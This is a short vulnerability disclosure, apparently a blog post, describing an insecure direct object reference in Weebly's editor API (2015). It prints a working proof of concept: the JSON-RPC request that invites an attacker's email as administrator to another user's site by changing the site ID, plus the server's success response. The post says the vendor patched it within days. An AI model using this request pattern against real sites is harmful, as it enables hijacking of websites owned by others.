Hijacking any Weebly Website [Insecure Direct Object Reference Vulnerability]
Title: Hijack any website from weebly.com by just adding an administrator to their website. [Insecure Direct Object Reference Vulnerability]VIDEO
=====
Weebly is a web-hosting service that allows the user to “drag-and-drop” while using their website builder. As of August 2012, Weebly hosts over 20 million sites with a monthly rate of over 1 million unique visitors. ‘ http://en.wikipedia.org/wiki/ ’.
Website: https://www.weebly.com
Any weebly website owner can hijack any weebly website by just inviting himself/herself through email and modifying the site ID in HTTP Request.
=====
PoC:
Video:
https://www.youtube.com/watch?
Written:
Here's the website details of the target:
weebly site: ohhyeahphfudge.weebly.com
owner_id: 47812623
site_id: 367503762921888574
=====
HTTP Request:
POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com
{"jsonrpc":"2.0","method":" Contributor::createMultiple","
params":[{"role":"admin"," email":" huehuehuehue10+weebly@ ","message":" HiJacking Weebly websites","restrict_pages": false,"owner_id":"47812623"," site_id":"367503762921888574"} ],"id":0}
=====
HTTP Response:
HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26
{"jsonrpc":"2.0","id":0," method":"Contributor:: createMultiple","result":{" success":true,"models":[{"id": "invitation- 596276730608950492","pending": true,"owner_id":"47812623"," user_id":null,"site_id":" 367503762921888574","email":" h ","last_login":false,"role":" admin","display_role":" Administrator","invitation_id" :"596276730608950492"," invitation_used":null," invitation_retracted":null," message":"HiJacking Weebly websites","restrict_pages": false,"allowed_pages":[]," allow_publish":true,"allow_ stats":true,"allow_form_ entries":true,"allow_blog_ comments":true}],"errors":[]}}
=====
Report Timeline:
February 22, 2015 – Bug Found by Allan Jay Dumanhug.
February 26, 2015 – Vendor Response and Vendor Fix/Patch.
Komentarų nėra:
Rašyti komentarą